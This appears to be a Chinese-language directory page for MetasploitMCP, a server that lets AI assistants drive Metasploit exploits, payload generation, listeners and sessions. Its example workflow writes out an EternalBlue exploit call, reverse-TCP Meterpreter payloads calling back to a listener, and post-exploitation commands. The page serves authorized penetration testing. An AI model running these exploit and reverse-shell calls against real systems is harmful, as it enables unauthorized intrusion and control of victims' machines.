MetasploitMCP
MetasploitMCP 是一座连接大型语言模型(如 Claude)与 Metasploit 渗透测试框架的智能桥梁。它通过模型上下文协议(MCP),让 AI 助手能够直接理解并执行复杂的安全测试指令,将原本需要手动输入的命令转化为自然的对话交互。
这一工具主要解决了安全测试流程门槛高、操作繁琐的问题。传统渗透测试需要专业人员熟记大量模块命令和参数,而 MetasploitMCP 允许用户用通俗语言描述需求,AI 即可自动调用漏洞利用、载荷生成、会话管理及监听器控制等核心功能,大幅提升了工作流的效率与灵活性。
该工具专为网络安全研究人员、渗透测试工程师及安全开发者设计。需要注意的是,由于其直接操控强大的攻击模拟功能,使用者必须具备相应的专业资质,并严格仅在获得授权的环境中进行测试。
其技术亮点在于标准化的工具集成能力,不仅支持搜索漏洞和载荷模块,还能动态配置并执行攻击任务、管理后台会话及生成恶意载荷文件。同时,它灵活支持 HTTP/SSE 和 STDIO 两种传输模式,既能适配本地桌面端 AI 应用,也能部署为远程服务,为构建自动化安全运营体系提供了坚实的技术基础。
使用场景
某安全团队在对内部测试网段进行紧急漏洞验证时,需要快速评估多台服务器的风险暴露面。
没有 MetasploitMCP 时
- 分析师需在终端手动输入冗长的
msfconsole命令查找模块,频繁切换上下文导致操作中断。 - 编写批量测试脚本门槛高,难以根据实时扫描结果动态调整攻击载荷(Payload)参数。
- 会话管理依赖人工监控,容易遗漏后台活跃的 Shell 连接,增加被检测风险。
- 从发现漏洞到生成报告周期长,因为需要手动截图、复制命令输出并整理文档。
- 新手成员因不熟悉复杂的 Metasploit 指令体系,难以独立承担渗透测试任务。
使用 MetasploitMCP 后
- 分析师直接通过自然语言让 MetasploitMCP 搜索并列出适用模块,无需记忆繁琐命令语法。
- 利用 AI 自动调用
generate_payload和run_exploit接口,根据目标架构即时生成并执行定制化攻击。 - MetasploitMCP 实时监控活动会话,支持一键发送指令或终止可疑连接,实现精细化管控。
- 整个测试流程由 AI 辅助记录,自动汇总执行步骤与结果,大幅缩短报告撰写时间。
- 初级人员通过对话式交互即可驱动专业工具,降低了渗透测试的操作门槛和学习曲线。
MetasploitMCP 将复杂的命令行渗透工作流转化为直观的自然语言交互,显著提升了安全测试的效率与可访问性。
运行环境要求
- Linux
- macOS
- Windows
未说明
未说明

快速开始
Metasploit MCP 服务器
用于集成 Metasploit 框架的模型上下文协议 (MCP) 服务器。
https://github.com/user-attachments/assets/39b19fb5-8397-4ccd-b896-d1797ec185e1
描述
该 MCP 服务器为大型语言模型(如 Claude)与 Metasploit 框架渗透测试平台之间提供桥梁。它允许 AI 助手通过标准化工具动态访问和控制 Metasploit 的功能,从而实现对复杂安全测试工作流的自然语言接口。
特性
模块信息
- list_exploits: 搜索并列出可用的 Metasploit 漏洞利用模块
- list_payloads: 搜索并列出可用的 Metasploit payload 模块,并可选择按平台和架构进行过滤
漏洞利用流程
- run_exploit: 配置并针对目标执行漏洞利用,可选择先运行检查
- run_auxiliary_module: 运行任何带有自定义选项的 Metasploit 辅助模块
- run_post_module: 对现有会话执行后渗透模块
Payload 生成
- generate_payload: 使用 Metasploit RPC 生成 payload 文件(保存到本地)
会话管理
- list_active_sessions: 显示当前的 Metasploit 会话及其详细信息
- send_session_command: 在活动的 shell 或 Meterpreter 会话中执行命令
- terminate_session: 强制结束活动会话
处理器管理
- list_listeners: 显示所有活动的监听器和后台作业
- start_listener: 创建一个新的 multi/handler 监听器以接收连接
- stop_job: 终止任何正在运行的作业或监听器
先决条件
- 已安装 Metasploit 框架并运行 msfrpcd
- Python 3.10 或更高版本
- 必要的 Python 包(参见 requirements.txt)
安装
- 克隆本仓库
- 安装依赖:
pip install -r requirements.txt - 配置环境变量(可选):
MSF_PASSWORD=yourpassword MSF_SERVER=127.0.0.1 MSF_PORT=55553 MSF_SSL=false PAYLOAD_SAVE_DIR=/path/to/save/payloads # 可选:生成的 payload 保存路径
使用方法
启动 Metasploit RPC 服务:
msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553
传输方式
服务器支持两种传输方式:
- HTTP/SSE(服务器发送事件):默认模式,便于与大多数 MCP 客户端互操作
- STDIO(标准输入/输出):用于 Claude Desktop 等直接管道连接
可通过 --transport 标志显式选择传输模式:
# 使用 HTTP/SSE 传输(默认)
python MetasploitMCP.py --transport http
# 使用 STDIO 传输
python MetasploitMCP.py --transport stdio
HTTP 模式的附加选项:
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
Claude Desktop 集成
对于 Claude Desktop 集成,请配置 claude_desktop_config.json:
{
"mcpServers": {
"metasploit": {
"command": "uv",
"args": [
"--directory",
"C:\\path\\to\\MetasploitMCP",
"run",
"MetasploitMCP.py",
"--transport",
"stdio"
],
"env": {
"MSF_PASSWORD": "yourpassword"
}
}
}
}
其他 MCP 客户端
对于使用 HTTP/SSE 的其他 MCP 客户端:
- 以 HTTP 模式启动服务器:
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085 - 配置您的 MCP 客户端连接至:
- SSE 端点:
http://your-server-ip:8085/sse
- SSE 端点:
安全注意事项
⚠️ 重要安全警告:
该工具提供了对 Metasploit 框架功能的直接访问权限,其中包括强大的漏洞利用功能。请谨慎使用,仅在您获得明确授权的安全测试环境中使用。
- 始终在执行前验证并审查所有命令
- 仅在隔离的测试环境或获得适当授权的情况下运行
- 请注意,后渗透命令可能导致系统发生重大修改
示例工作流
基本漏洞利用
- 列出可用的漏洞:
list_exploits("ms17_010") - 选择并运行一个漏洞:
run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444}) - 列出会话:
list_active_sessions() - 执行命令:
send_session_command(1, "whoami")
后渗透
- 运行后渗透模块:
run_post_module("windows/gather/enum_logged_on_users", 1) - 发送自定义命令:
send_session_command(1, "sysinfo") - 完成后终止会话:
terminate_session(1)
处理器管理
- 启动监听器:
start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444) - 列出活动监听器:
list_listeners() - 生成 payload:
generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444}) - 停止监听器:
stop_job(1)
测试
该项目包含全面的单元测试和集成测试,以确保可靠性和可维护性。
测试先决条件
安装测试依赖:
pip install -r requirements-test.txt
或者使用便捷的安装脚本:
python run_tests.py --install-deps
# OR
make install-deps
运行测试
快速命令
# 运行所有测试
python run_tests.py --all
# OR
make test
# 带覆盖率报告运行
python run_tests.py --all --coverage
# OR
make coverage
# 带 HTML 覆盖率报告运行
python run_tests.py --all --coverage --html
# OR
make coverage-html
特定测试套件
# 仅运行单元测试
python run_tests.py --unit
# OR
make test-unit
# 仅运行集成测试
python run_tests.py --integration
# OR
make test-integration
# 选项解析测试
python run_tests.py --options
# OR
make test-options
# 辅助函数测试
python run_tests.py --helpers
# OR
make test-helpers
# MCP 工具测试
python run_tests.py --tools
# OR
make test-tools
测试选项
# 包含慢速测试
python run_tests.py --all --slow
# 包含网络测试(需要实际网络)
python run_tests.py --all --network
# 详细输出
python run_tests.py --all --verbose
# 快速测试(无覆盖率,快速失败)
make quick-test
# 调试模式(详细失败信息)
make test-debug
测试结构
tests/test_options_parsing.py:优雅选项解析功能的单元测试tests/test_helpers.py:内部辅助函数和 MSF 客户端管理的单元测试tests/test_tools_integration.py:所有 MCP 工具与模拟 Metasploit 后端的集成测试conftest.py:共享的测试夹具和配置pytest.ini:包含覆盖率设置的 Pytest 配置
测试特性
- 全面的模拟:所有 Metasploit 依赖项均被模拟,因此测试无需实际安装 MSF 即可运行。
- 异步支持:使用 pytest-asyncio 提供完整的 async/await 测试支持。
- 覆盖率报告:生成详细的覆盖率分析,并以 HTML 格式呈现。
- 参数化测试:高效测试多种输入场景。
- 夹具管理:为常见设置场景提供可重用的测试夹具。
覆盖率报告
运行带覆盖率的测试后,报告可在以下位置查看:
- 终端:测试运行结束后显示覆盖率摘要。
- HTML:
htmlcov/index.html(使用--html选项时)。
CI/CD 集成
用于持续集成:
# 适合 CI 的测试命令
make ci-test
# 或者
python run_tests.py --all --coverage --verbose
配置选项
有效载荷保存目录
默认情况下,使用 generate_payload 生成的有效载荷会保存到用户主目录下的 payloads 目录中(例如 ~/payloads 或 C:\Users\YourUsername\payloads)。您可以通过设置 PAYLOAD_SAVE_DIR 环境变量来自定义该路径。
设置环境变量的方法:
Windows (PowerShell):
$env:PAYLOAD_SAVE_DIR = "C:\custom\path\to\payloads"Windows (命令提示符):
set PAYLOAD_SAVE_DIR=C:\custom\path\to\payloadsLinux/macOS:
export PAYLOAD_SAVE_DIR=/custom/path/to/payloads在 Claude Desktop 配置中:
"env": { "MSF_PASSWORD": "yourpassword", "PAYLOAD_SAVE_DIR": "C:\\your\\actual\\path\\to\\payloads" // 仅当需要覆盖默认值时添加 }
注意: 如果您指定了自定义路径,请确保该路径已存在,或应用程序具有创建该路径的权限。如果路径无效,有效载荷生成可能会失败。
许可证
Apache 2.0
常见问题
相似工具推荐
stable-diffusion-webui
stable-diffusion-webui 是一个基于 Gradio 构建的网页版操作界面,旨在让用户能够轻松地在本地运行和使用强大的 Stable Diffusion 图像生成模型。它解决了原始模型依赖命令行、操作门槛高且功能分散的痛点,将复杂的 AI 绘图流程整合进一个直观易用的图形化平台。 无论是希望快速上手的普通创作者、需要精细控制画面细节的设计师,还是想要深入探索模型潜力的开发者与研究人员,都能从中获益。其核心亮点在于极高的功能丰富度:不仅支持文生图、图生图、局部重绘(Inpainting)和外绘(Outpainting)等基础模式,还独创了注意力机制调整、提示词矩阵、负向提示词以及“高清修复”等高级功能。此外,它内置了 GFPGAN 和 CodeFormer 等人脸修复工具,支持多种神经网络放大算法,并允许用户通过插件系统无限扩展能力。即使是显存有限的设备,stable-diffusion-webui 也提供了相应的优化选项,让高质量的 AI 艺术创作变得触手可及。
everything-claude-code
everything-claude-code 是一套专为 AI 编程助手(如 Claude Code、Codex、Cursor 等)打造的高性能优化系统。它不仅仅是一组配置文件,而是一个经过长期实战打磨的完整框架,旨在解决 AI 代理在实际开发中面临的效率低下、记忆丢失、安全隐患及缺乏持续学习能力等核心痛点。 通过引入技能模块化、直觉增强、记忆持久化机制以及内置的安全扫描功能,everything-claude-code 能显著提升 AI 在复杂任务中的表现,帮助开发者构建更稳定、更智能的生产级 AI 代理。其独特的“研究优先”开发理念和针对 Token 消耗的优化策略,使得模型响应更快、成本更低,同时有效防御潜在的攻击向量。 这套工具特别适合软件开发者、AI 研究人员以及希望深度定制 AI 工作流的技术团队使用。无论您是在构建大型代码库,还是需要 AI 协助进行安全审计与自动化测试,everything-claude-code 都能提供强大的底层支持。作为一个曾荣获 Anthropic 黑客大奖的开源项目,它融合了多语言支持与丰富的实战钩子(hooks),让 AI 真正成长为懂上
ComfyUI
ComfyUI 是一款功能强大且高度模块化的视觉 AI 引擎,专为设计和执行复杂的 Stable Diffusion 图像生成流程而打造。它摒弃了传统的代码编写模式,采用直观的节点式流程图界面,让用户通过连接不同的功能模块即可构建个性化的生成管线。 这一设计巧妙解决了高级 AI 绘图工作流配置复杂、灵活性不足的痛点。用户无需具备编程背景,也能自由组合模型、调整参数并实时预览效果,轻松实现从基础文生图到多步骤高清修复等各类复杂任务。ComfyUI 拥有极佳的兼容性,不仅支持 Windows、macOS 和 Linux 全平台,还广泛适配 NVIDIA、AMD、Intel 及苹果 Silicon 等多种硬件架构,并率先支持 SDXL、Flux、SD3 等前沿模型。 无论是希望深入探索算法潜力的研究人员和开发者,还是追求极致创作自由度的设计师与资深 AI 绘画爱好者,ComfyUI 都能提供强大的支持。其独特的模块化架构允许社区不断扩展新功能,使其成为当前最灵活、生态最丰富的开源扩散模型工具之一,帮助用户将创意高效转化为现实。
ML-For-Beginners
ML-For-Beginners 是由微软推出的一套系统化机器学习入门课程,旨在帮助零基础用户轻松掌握经典机器学习知识。这套课程将学习路径规划为 12 周,包含 26 节精炼课程和 52 道配套测验,内容涵盖从基础概念到实际应用的完整流程,有效解决了初学者面对庞大知识体系时无从下手、缺乏结构化指导的痛点。 无论是希望转型的开发者、需要补充算法背景的研究人员,还是对人工智能充满好奇的普通爱好者,都能从中受益。课程不仅提供了清晰的理论讲解,还强调动手实践,让用户在循序渐进中建立扎实的技能基础。其独特的亮点在于强大的多语言支持,通过自动化机制提供了包括简体中文在内的 50 多种语言版本,极大地降低了全球不同背景用户的学习门槛。此外,项目采用开源协作模式,社区活跃且内容持续更新,确保学习者能获取前沿且准确的技术资讯。如果你正寻找一条清晰、友好且专业的机器学习入门之路,ML-For-Beginners 将是理想的起点。
ragflow
RAGFlow 是一款领先的开源检索增强生成(RAG)引擎,旨在为大语言模型构建更精准、可靠的上下文层。它巧妙地将前沿的 RAG 技术与智能体(Agent)能力相结合,不仅支持从各类文档中高效提取知识,还能让模型基于这些知识进行逻辑推理和任务执行。 在大模型应用中,幻觉问题和知识滞后是常见痛点。RAGFlow 通过深度解析复杂文档结构(如表格、图表及混合排版),显著提升了信息检索的准确度,从而有效减少模型“胡编乱造”的现象,确保回答既有据可依又具备时效性。其内置的智能体机制更进一步,使系统不仅能回答问题,还能自主规划步骤解决复杂问题。 这款工具特别适合开发者、企业技术团队以及 AI 研究人员使用。无论是希望快速搭建私有知识库问答系统,还是致力于探索大模型在垂直领域落地的创新者,都能从中受益。RAGFlow 提供了可视化的工作流编排界面和灵活的 API 接口,既降低了非算法背景用户的上手门槛,也满足了专业开发者对系统深度定制的需求。作为基于 Apache 2.0 协议开源的项目,它正成为连接通用大模型与行业专有知识之间的重要桥梁。
OpenHands
OpenHands 是一个专注于 AI 驱动开发的开源平台,旨在让智能体(Agent)像人类开发者一样理解、编写和调试代码。它解决了传统编程中重复性劳动多、环境配置复杂以及人机协作效率低等痛点,通过自动化流程显著提升开发速度。 无论是希望提升编码效率的软件工程师、探索智能体技术的研究人员,还是需要快速原型验证的技术团队,都能从中受益。OpenHands 提供了灵活多样的使用方式:既可以通过命令行(CLI)或本地图形界面在个人电脑上轻松上手,体验类似 Devin 的流畅交互;也能利用其强大的 Python SDK 自定义智能体逻辑,甚至在云端大规模部署上千个智能体并行工作。 其核心技术亮点在于模块化的软件智能体 SDK,这不仅构成了平台的引擎,还支持高度可组合的开发模式。此外,OpenHands 在 SWE-bench 基准测试中取得了 77.6% 的优异成绩,证明了其解决真实世界软件工程问题的能力。平台还具备完善的企业级功能,支持与 Slack、Jira 等工具集成,并提供细粒度的权限管理,适合从个人开发者到大型企业的各类用户场景。